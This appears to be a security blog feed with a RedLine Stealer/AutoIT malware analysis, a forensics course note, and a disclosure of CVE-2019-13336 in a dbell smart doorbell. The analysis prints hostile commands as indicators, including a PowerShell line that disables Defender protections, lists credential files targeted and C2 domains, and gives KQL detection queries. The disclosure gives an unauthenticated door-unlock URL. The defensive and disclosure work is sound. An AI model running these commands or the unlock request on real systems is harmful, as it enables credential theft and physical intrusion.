Jekyll2023-12-18T01:41:58+00:00https://noahclements.com/feed.xmlgenoffa blog for my projects, write-ups, and other stuffRedLine Stealer/AutoIT Malware Analysis2022-08-05T22:10:00+00:002022-08-05T22:10:00+00:00https://noahclements.com/RedLine-Stealer-AutoIT-Malware-Analysis<p>After a recent analysis of multiple files grabbed from a device, this appears to be a new strain of the AutoIT Malware campaign that includes RedLine Stealer.<br />
This malware uses AutoIT as a wrapper to deliver malware and attempts to hide its tracks with obfuscation, anti-analysis, and fileless techniques.</p>
<p>The user was attempting to install Grammarly and downloaded an .iso file from a malicious website.
The file was then mounted to the D:\ drive and the executable was run shortly after.</p>
<p>The malware was able to evade detection by dropping multiple obfuscated and encrypted temporary scripts that were then run by an AutoIT executable.<br />
The RedLine Stealer part of the malware can attempt to grab browser data, files from desktop, Crypto wallets, FTP clients, user info, screenshots, and more. It also attempted to achieve persistence by adding local admin accounts and installing RDPWrapper and adding firewall rules to allow incoming traffic on port 3389.
</p>
<p>I was unable to analyze what exactly was sent in the packets to the C2 server, but event logs show that it was likely saved browser data/passwords and device information.
</p>
<p>Sources used in this write-up:</p>
<blockquote>
<ul>
<li><a href="https://www.zscaler.com/blogs/security-research/cybergate-rat-and-redline-stealer-delivered-ongoing-autoit-malware-campaigns" style="color:white;">https://www.zscaler.com/blogs/security-research/cybergate-rat-and-redline-stealer-delivered-ongoing-autoit-malware-campaigns</a></li>
</ul>
</blockquote>
<h1 id="details"><span style="color:white;font-size:30px;"><ins><b>Details</b></ins></span></h1>
<h2 id="user-downloaded-grammarly79784iso"><ins style="color:white;">User downloaded “<em>grammarly79784.iso</em>”</ins></h2>
<ul>
<li><em>h[xx]ps://tw0chinz[.]com/y4TyREUBrJ/?gaLm9GUXTK=[base64 line]</em></li>
<li>which originated from URL <em>h[xx]ps://nice-quiz[.]com</em></li>
<li>This URL was a one-time link as it now returns “<em>Error: Wrong GET request.”</em> This was likely done as an effort to evade analysis/detection</li>
<li>The base <em>tw0chinz[.]com</em> URL shows a Cloudflare DDOS protection waiting screen which never redirects.</li>
</ul>
<h2 id="grammarly79784exe-was-executed-from-d"><ins style="color:white;">“<em>GRAMMARLY79784.EXE</em>” was executed from D:\</ins></h2>
<ul>
<li>This was mounted to D:\ following the .iso download.</li>
<li>Volume Info: <em>\VOLUME{0000000000000000-a0e06908} Serial: A0E06908 Created: 1601-01-01 00:00:00 Directories: 0 File references: 1</em></li>
<li>observed using ‘Rundll32’ technique</li>
<li>clears the registry key on execution on value name: <em>wextract_cleanup0</em></li>
<li>Size: 297.84 MB</li>
</ul>
<h2 id="executable-prefetch-file-shows-that-five-files-were-created-in-folder-cusersuserappdatalocaltempixp000tmp"><ins style="color:white;">Executable Prefetch file shows that five files were created in folder <em>C:\Users\User\AppData\Local\Temp\IXP000.TMP\</em></ins></h2>
<p><img src="/assets/images/Prefetch.png" alt="Prefetch" /></p>
<ul>
<li>Che.vsd
<ul>
<li><a href="https://www.virustotal.com/gui/file/52efaf93011bb26252948ae7baa2c180d21b9e8d1b9f9f67431aa782e4ba035b" style="color:white;">VirusTotal Link</a></li>
</ul>
</li>
<li>Confronto.vsd
<ul>
<li><a href="https://www.virustotal.com/gui/file/8cb90c182c28aec4d54cc122dcad3dfc70bad73fb7a3e28e2640f558407bf8f6" style="color:white;">VirusTotal Link</a></li>
</ul>
</li>
<li>Aspettero.vsd</li>
<li>Scegliere.vsd</li>
<li>Narcotico.vsd</li>
</ul>
<h2 id="confusaexepif-is-executed-from-folder-localtempixp000tmp"><ins style="color:white;"><em>Confusa.exe.pif</em> is executed from folder <em>\Local\Temp\IXP000.TMP</em></ins></h2>
<ul>
<li>File is signed by AutoIT Consulting Ltd
<ul>
<li><a href="https://www.virustotal.com/gui/file/3e26723394ade92f8163b5643960189cb07358b0f96529a477d37176d68aa0a0" style="color:white;">VirusTotal Link </a></li>
</ul>
</li>
<li>Relations in Virustotal show that many Execution Parents share Backdoor/RedLine detection.</li>
<li><strong>This is the main source of all malicious activity that followed</strong></li>
<li>Uses <em>jsc.exe</em> as a child process, which is a JScript .NET compiler that produces executables from JavaScript</li>
</ul>
<h2 id="confusaexepif-activities"><ins style="color:white;"><em>Confusa.exe.pif</em> activities</ins></h2>
<ul>
<li><em>cmd.exe /c powershell -Command Add-MpPreference -ExclusionPath “$env:ProgramFiles”,”$env:Appdata”;Add-MpPreference -ExclusionProcess “C:\Windows\System32\wscript.exe”;Add-MpPreference -ExclusionExtension vbs; Set-MpPreference SubmitSamplesConsent NeverSend; Set-MpPreference -PUAProtection Disabled</em></li>
<li>established connection with <em>136.244.105.79:80 (atmosphereexpansion[.]quest)</em></li>
<li>Ran query for DiskDrive, Antivirus Product, AntiSpyWareProduct, FirewallProduct, Processor, VideoController, OperatingSystem, Process</li>
<li>Attempts to take screenshot using BitBlt API</li>
<li>Creates six .vbs files in <em>C:\Users\User\AppData\Roaming\XaCFEtuQIX\</em></li>
<li>CCleaner added as a scheduled task</li>
<li>Created a batch file in <em>\AppData\Roaming\XaCFEtuQIX\</em></li>
<li>Accesses Chrome and Edge Login and Web Data
<ul>
<li>\AppData\Local\Google\Chrome\User Data\Default\Login Data</li>
<li>\AppData\Local\Google\Chrome\User Data\Default\Web Data</li>
<li>\AppData\Local\Microsoft\Edge\User Data\Default\Login Data</li>
<li>\AppData\Local\Microsoft\Edge\User Data\Default\Web Data</li>
</ul>
</li>
<li>Installs RDP Wrapper</li>
<li>Creates a <em>MySQLNotifierTask56</em> scheduled task</li>
<li>Creates <em>plink.exe</em></li>
</ul>
<h2 id="ezcvajcfbrmcwvbs-also-ran-as-an-identical-batch-file"><ins style="color:white;">ezcvajcfbrmcw.vbs (Also ran as an identical batch file)</ins></h2>
<p><img src="/assets/images/ezcvajcfbrmcw.png" alt="batch code" width="80%" height="70%" /></p>
<ul>
<li>Appears to add multiple local admin users to the device under group names “Administrators” and “Remote Desktop Users”</li>
<li>Users are added to SpecialAccounts registry</li>
<li>A firewall rule is created to allow incoming RDP connections on port 13389 and 3389</li>
<li>Excludes certain paths and extensions from being scanned and samples being sent.
<ul>
<li>C:\ProgramFiles</li>
<li>$env:Appdata</li>
<li>C:\Windows\System32\wscript.exe</li>
<li>*.vbs</li>
<li>PUA Protection Disabled</li>
<li>Deletes Windows Defender scan history</li>
</ul>
</li>
</ul>
<h2 id="irpksgnunggrgbvbs"><ins style="color:white;">iRPKSGnUNGgrgb.vbs</ins></h2>
<p><img src="/assets/images/iRPKSGnUNGgrgb_cmd.png" alt="vbs command line" /></p>
<p>This appears to communicate with the C2 server, initially sending the unique bot ID.</p>
<ul>
<li>The first successful communications were to <em>tw0chinz[.]com</em> where the download originated, however further requests were sent to <em>ifunteck[.]com</em>
<ul>
<li><img src="/assets/images/iRPKSGnUNGgrgb_code.png" alt="vbs malware" width="80%" height="90%" /></li>
</ul>
</li>
<li>C2 Server(s) URL: <em>h[xx]ps://ifunteck[.]com</em> and <em>h[xx]ps://tw0chinz[.]com</em>
<ul>
<li>Sent decoded command: <em>GzO=siuvqJCeOb&LBJn=aFvMHnOOkI&KISvury={246A96FD-DC5A-4B76-BC69-4CE9DA1E3B43}</em>
<ul>
<li>Similar structure:</li>
</ul>
<p><img src="/assets/images/cybergate_decrypted_comm.jpg" alt="C2 Communication" width="60%" height="60%" /></p>
</li>
</ul>
</li>
<li>There were seven network packets sent to the C2 IP address. Logs show that it was likely saved browser data/passwords and device information.</li>
<li>This script also downloads RDPWrap from a Github repo
<ul>
<li>https://github.com.com/stascorp/rdpwrap
<ul>
<li><img src="/assets/images/rdpwrap.png" alt="rdpwrap install" /></li>
</ul>
</li>
</ul>
</li>
</ul>
<h2 id="oqelmujegltwrbmvbs"><ins style="color:white;">oqelmujegltwrbm.vbs</ins></h2>
<ul>
<li>Appears to install RDPWrap and ensure persistence on the device</li>
<li>
<p><em>reg query “HKLM\SYSTEM\CurrentControlSet\Services\TermService\Parameters” /f “rdpwrap.dll”</em>
</p>
<p><img src="/assets/images/oqelmujegltwrbm_code.png" alt="vbs malware" width="50%" height="50%" /></p>
</li>
</ul>
<h2 id="gycxepariqvwskisvbs"><ins style="color:white;">GYCxEPARiqVWSkIs.vbs</ins></h2>
<ul>
<li>Appears to be the script that is used to exfiltrate data using RDPWrap.exe, and auto-updates the software.
<img src="/assets/images/GYCxEPARiqVWSkIs_rdp.png" alt="vbs malware" width="70%" height="70%" /></li>
<li>Features comment in Russian that translates to “Write a line”
<img src="/assets/images/GYCxEPARiqVWSkIs_russian.png" alt="russian code comment" /> </li>
<li>Three .vbs files have XML formatting which appear to be used for further scripts being launched
<img src="/assets/images/xml_1.png" alt="xml formatting" />
<img src="/assets/images/xml_2.png" alt="xml formatting 2" width="70%" height="70%" />
<img src="/assets/images/xml_3.png" alt="xml formatting 3" /></li>
</ul>
<h1 id="iocs"><span style="color:white;font-size:30px;"><ins><b>IOC’s</b></ins></span></h1>
<ul>
<li>563dd781dd63543f7ee67747f044fbd77877cd46e34df7de1c96f287eeb39b14</li>
<li>7d0cb57ba7d2af6ff75a9c203d1338ce31199d07eeca391e9a82fedcbe068512</li>
<li>d0808b62e5c840b879d4ae0aabf78878271ee724bfcf58001032c295ec69cd4d</li>
<li>b8a717e36a89ebd6384e5f56b2691c34c1fedf08f9911b5e4c3f127f70edfb62</li>
<li>dc42333f20b3a524dc7d7a1c3301188d36642fb077758c2ab4d824a0439ecd00</li>
<li>c879379224bc8dc4a4f495f989711714a936892b11e7a1cf6e7b79654dc8f928</li>
<li>f75cbd2fc596ba51eb485947f7a24a139b5545ec3ebe16e96b89fe38440bb974</li>
<li>049e86e6c3f73cdf6147075a2eab50c009874ea9b0b174a150add6fb73c1d9b4</li>
<li>3e26723394ade92f8163b5643960189cb07358b0f96529a477d37176d68aa0a0</li>
<li>e970530af9bbf865f4c7de8d113e522f5f32afd5c84f378d15bf073810507599</li>
<li>ac92d4c6397eb4451095949ac485ef4ec38501d7bb6f475419529ae67e297753</li>
<li>8cb90c182c28aec4d54cc122dcad3dfc70bad73fb7a3e28e2640f558407bf8f6</li>
<li>798af20db39280f90a1d35f2ac2c1d62124d1f5218a2a0fa29d87a13340bd3e4</li>
<li>52efaf93011bb26252948ae7baa2c180d21b9e8d1b9f9f67431aa782e4ba035b</li>
<li>d113d314895748bf9d1a8926ea6fa4f734b604ebb69cd04a624179c35ff88eaa</li>
<li>90a410437c4523cb14f348c3dcdb8256b3dfa1e6ac524be2793fdcab64258b11</li>
<li>3cea6eaf23e94e38d790a9ccf43e490f8ad3da3eb920e3a967d18947905b60b7</li>
<li>b5665cb53721f0039c34e05f88f259e64a224027cf6be34f3ac13082ab8a0663</li>
<li>e868aba6d185c35ac1ca083c53cfc3a1259731eca319bb4a487b358d620e190a</li>
<li>a8108a5add857c8d3d6e8b1f4a55a1243f6d728dd8904b29e0622ea8df3f60a6</li>
<li>f75b7f5ac63dac86514ef42e1644b5450524fee4291c520364814bcc951814ba</li>
<li>h[xx]ps://ifunteck[.]com</li>
<li>h[xx]ps://tw0chinz[.]com</li>
<li>h[xx]ps://nice-quiz[.]com</li>
<li><em>findstr /V /R “^zsXALugVPsbikcLGmlTQMSJGkUUtRoHQkZmHLQyLLuVpnCdInRQPNWfBIsgQkprGKGWkWrUJtiyFXmiJDk$” Che.vsd</em> </li>
<li><em>C:\Windows\SysWOW64\PING.EXE ping localhost -n 5</em></li>
<li><em>cmd /c cmd < Confronto.vsd & ping -n 5 localhost</em></li>
<li><em>*.exe.pif</em> files being created</li>
<li><em>jsc.exe</em> being a child process of <em>*.exe.pif</em></li>
<li><em>IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive</em></li>
<li><em>IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController</em></li>
<li>New files in <em>C:\USERS\User\APPDATA\LOCAL\TEMP\IXP000.TMP\</em></li>
<li><em>cmd.exe /c powershell -Command Add-MpPreference -ExclusionPath “$env:ProgramFiles”,”$env:Appdata”;Add-MpPreference -ExclusionProcess “C:\Windows\System32\wscript.exe”;Add-MpPreference -ExclusionExtension vbs; Set-MpPreference -SubmitSamplesConsent NeverSend; Set-MpPreference -PUAProtection Disabled</em> </li>
<li>New .vbs and .bat files added in <em>C:\Users\User\AppData\Roaming\RNG folder name\</em></li>
<li><em>C:\Users\User\AppData\Roaming\plink.exe</em> being created by <em>jsc.exe</em></li>
</ul>
<h1 id="365-defender-kql-queries"><span style="color:white;font-size:30px;"><ins><b>365 Defender KQL Queries</b></ins></span></h1>
<h2 id="urls"><ins style="color:white;">URL’s</ins></h2>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>DeviceNetworkEvents
| where RemoteUrl contains "tw0chinz" or RemoteUrl contains "nice-quiz"
or RemoteUrl contains "ifunteck" or RemoteUrl contains "Hyphnhostn"
or RemoteUrl contains "trk.record-certainly-numeral-draw"
or RemoteUrl contains "schemicalc" or RemoteUrl contains "bishoppeda"
</code></pre></div></div>
<h2 id="hashes"><ins style="color:white;">Hashes</ins></h2>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>DeviceFileEvents
| where SHA256 has_any ("563dd781dd63543f7ee67747f044fbd77877cd46e34df7de1c96f287eeb39b14",
"7d0cb57ba7d2af6ff75a9c203d1338ce31199d07eeca391e9a82fedcbe068512",
"d0808b62e5c840b879d4ae0aabf78878271ee724bfcf58001032c295ec69cd4d",
"b8a717e36a89ebd6384e5f56b2691c34c1fedf08f9911b5e4c3f127f70edfb62",
"dc42333f20b3a524dc7d7a1c3301188d36642fb077758c2ab4d824a0439ecd00",
"c879379224bc8dc4a4f495f989711714a936892b11e7a1cf6e7b79654dc8f928",
"f75cbd2fc596ba51eb485947f7a24a139b5545ec3ebe16e96b89fe38440bb974",
"049e86e6c3f73cdf6147075a2eab50c009874ea9b0b174a150add6fb73c1d9b4",
"3e26723394ade92f8163b5643960189cb07358b0f96529a477d37176d68aa0a0",
"e970530af9bbf865f4c7de8d113e522f5f32afd5c84f378d15bf073810507599",
"ac92d4c6397eb4451095949ac485ef4ec38501d7bb6f475419529ae67e297753",
"8cb90c182c28aec4d54cc122dcad3dfc70bad73fb7a3e28e2640f558407bf8f6",
"798af20db39280f90a1d35f2ac2c1d62124d1f5218a2a0fa29d87a13340bd3e4",
"52efaf93011bb26252948ae7baa2c180d21b9e8d1b9f9f67431aa782e4ba035b",
"d113d314895748bf9d1a8926ea6fa4f734b604ebb69cd04a624179c35ff88eaa",
"90a410437c4523cb14f348c3dcdb8256b3dfa1e6ac524be2793fdcab64258b11",
"3cea6eaf23e94e38d790a9ccf43e490f8ad3da3eb920e3a967d18947905b60b7",
"b5665cb53721f0039c34e05f88f259e64a224027cf6be34f3ac13082ab8a0663",
"e868aba6d185c35ac1ca083c53cfc3a1259731eca319bb4a487b358d620e190a",
"a8108a5add857c8d3d6e8b1f4a55a1243f6d728dd8904b29e0622ea8df3f60a6",
"f75b7f5ac63dac86514ef42e1644b5450524fee4291c520364814bcc951814ba")
</code></pre></div></div>
<h2 id="pif-file-ioc"><ins style="color:white;">.pif File IOC</ins></h2>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>DeviceFileEvents
| where FileName endswith ".exe.pif"
</code></pre></div></div>
<h2 id="common-temp-folder-used"><ins style="color:white;">Common temp folder used</ins></h2>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>DeviceFileEvents
| where FileName endswith ".vsd"
| where FolderPath contains "\\AppData\\Local\\Temp\\IXP000.TMP\\"
</code></pre></div></div>
<h2 id="initial-exploit-ioc"><ins style="color:white;">Initial exploit IOC</ins></h2>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>DeviceProcessEvents
| where ProcessCommandLine contains "findstr /V /R"
</code></pre></div></div>
<h2 id="common-folder-used-for-scripts"><ins style="color:white;">Common folder used for scripts</ins></h2>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>DeviceFileEvents
| where FileName endswith ".vbs" or FileName endswith ".bat"
| where FolderPath contains "\\AppData\\Roaming\\"
</code></pre></div></div>
<h2 id="jscexe-being-used-to-compile-and-execute-pe-files"><ins style="color:white;">jsc.exe being used to compile and execute PE files</ins></h2>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>DeviceProcessEvents
| where InitiatingProcessParentFileName endswith ".pif"
| where InitiatingProcessFileName == "jsc.exe"
</code></pre></div></div>
<h2 id="initial-download-of-redline-malware"><ins style="color:white;">Initial download of RedLine malware</ins></h2>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>DeviceFileEvents
| where FileName endswith ".iso"
| where FolderPath contains "Recycle.Bin"
</code></pre></div></div>
<h2 id="localhost-ping-before-further-action-is-done"><ins style="color:white;">Localhost ping before further action is done</ins></h2>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>DeviceProcessEvents
| where ProcessCommandLine contains "ping -n 5"
</code></pre></div></div>noahclementsAfter a recent analysis of multiple files grabbed from a device, this appears to be a new strain of the AutoIT Malware campaign that includes RedLine Stealer. This malware uses AutoIT as a wrapper to deliver malware and attempts to hide its tracks with obfuscation, anti-analysis, and fileless techniques.CS4419 Forensics Final Report2022-08-04T22:10:00+00:002022-08-04T22:10:00+00:00https://noahclements.com/CS4419-Forensics-Final-Report<p>The goal of this final project was to analyze five memory dumps containing malicious activity and to come to a conclusion on what malware family it belonged to.
</p>
<p>This was my first forensics investigation using memory dumps and was an incredibly fun process digging through all the activity.
</p>
<p>Please note that my conclusions are just guesses based on my findings and may not be entirely accurate.
</p>
<embed src="/assets/images/CS4419 Final Report - Noah Clements.pdf" width="100%" height="1000px" align="center" />noahclementsThe goal of this final project was to analyze five memory dumps containing malicious activity and to come to a conclusion on what malware family it belonged to. Improper Input Validation on dbell Smart Doorbell Can Lead To Attackers Remotely Unlocking Door2019-10-07T22:10:00+00:002019-10-07T22:10:00+00:00https://noahclements.com/Improper-Input-Validation-on-dbell-Smart-Doorbell-Can-Lead-To-Attackers-Remotely-Unlocking-Door<ul>
<li>CVE Number: CVE-2019-13336</li>
</ul>
<center><h3>Foreword</h3></center>
<p>Before I get into this writeup, I’d like to thank Tamir Israel from the CIPPIC for helping me with legal issues regarding this disclosure and the EFF for referring me to him.
</p>
<p>This vulnerability allows any user to launch commands with no authentication verification through the doorbell’s web server. More specifically, if there is a lock connected to the relay switch on the doorbell, you can unlock the door locally on the network or remotely if it is exposed to the internet. Multiple email exchanges took place between me and dbell. <strong>This vulnerability remains unpatched.</strong>
</p>
<center><h3>Details</h3></center>
<p>After connecting the doorbell to my network, I started with a simple nmap port scan.</p>
<p><img src="/assets/images/nmap.png" alt="nmap scan" /></p>
<p>After going to port 81 in my browser, it led me to a GoAhead web server login request.</p>
<p><img src="/assets/images/rsz_login.png" alt="GoAhead login" /></p>
<p>I tried the default password which is listed on the back of the doorbell (admin:blank) and was given this interface.</p>
<p><img src="/assets/images/rsz_page.png" alt="Page" /></p>
<p>There were many cases of hardcoded credentials throughout the source code on the doorbell’s webserver.
</p>
<p><img src="/assets/images/rsz_creds1.png" alt="hardcoded creds 1" />
<img src="/assets/images/rsz_creds2.png" alt="hardcoded creds 1" /></p>
<p>But I was mostly interested in this commented out URL..
</p>
<p><img src="/assets/images/rsz_url.png" alt="commented out URL" /></p>
<p>
This looked to me as a gateway to reverse engineer the source code and call any of the functions.</p>
<p>Looking through the functions I discovered one that unlocks the door. For some background info, there is a small relay switch on the back of the doorbell. This switch can plug into a door lock, which can allow you unlock the door for a guest remotely.
</p>
<p>Upon entering this URL with your doorbell’s IP address into your browser, the doorbell lets out a “door is unlocked” voice message and will unlock the door for you.</p>
<blockquote>
<ul>
<li><strong>hxxp://xxx.xxx.xxx.xxx:81/openlock.cgi?loginuse=admin&loginpass=888888</strong></li>
</ul>
</blockquote>
<p>To make matters even worse, I accidentally discovered that those credentials don’t even matter. You can put absolutely whatever you want as the username and password values and it will execute.</p>
<blockquote>
<ul>
<li><strong>hxxp://xxx.xxx.xxx.xxx:81/openlock.cgi?loginuse=?????&loginpass=?????</strong></li>
</ul>
</blockquote>
<p>It is not limited to opening the lock either, any “.cgi” function that is on the webserver can be executed without it properly validating the input.
</p>
<p>Below is a POC video of the doorbell performing the unlocking function.
</p>
<p><a href="https://www.youtube.com/watch?v=SkTKt1nV57I"><img src="https://img.youtube.com/vi/SkTKt1nV57I/0.jpg" alt="Doorbell Unlocking POC" /></a></p>
<center><h3>Timeline</h3></center>
<ul>
<li><strong>July 4th, 2019</strong> – Privately disclosed vulnerability to dbell.</li>
<li><strong>July 4th, 2019</strong> – Reply from dbell thanking me and explaining its been discontinued for 3 years.</li>
<li><strong>July 4th, 2019</strong> – I requested if the vulnerability could be published earlier since the product has been discontinued.</li>
<li><strong>July 5th, 2019</strong> – dbell replies asking me not to disclose anything or else they’d take legal action and that I have malicious intent.</li>
<li><strong>July 9th, 2019</strong> – I replied explaining that I am being responsible and will be giving them 90 days.</li>
<li><strong>July 9th, 2019</strong> – dbell replied saying that there aren’t any apps on the app store to control this device, they care about their customers security and privacy…</li>
<li><strong>July 16th, 2019</strong> – I explained there are still apps on the app store that can be used to control this device, which helped in finding this vulnerability.</li>
<li><strong>July 18th, 2019</strong> – dbell replied with a very hostile email explaining again that I have malicious intent. They said that the email chain has been forwarded to their legal team and if I don’t stop in 10 days, they will file a case for extortion with the local police before taking legal action.</li>
<li><strong>August 27th, 2019</strong> – Tamir from CIPPIC sent a letter through email explaining that their accusations of malicious intent and extortion have no legal basis.</li>
<li><strong>September 26th, 2019</strong> – Tamir sent a 2 weeks notice to public disclosure in an email to dbell .</li>
<li><strong>October 7th, 2019</strong> – Vulnerability is publicly disclosed.</li>
</ul>noahclementsCVE Number: CVE-2019-13336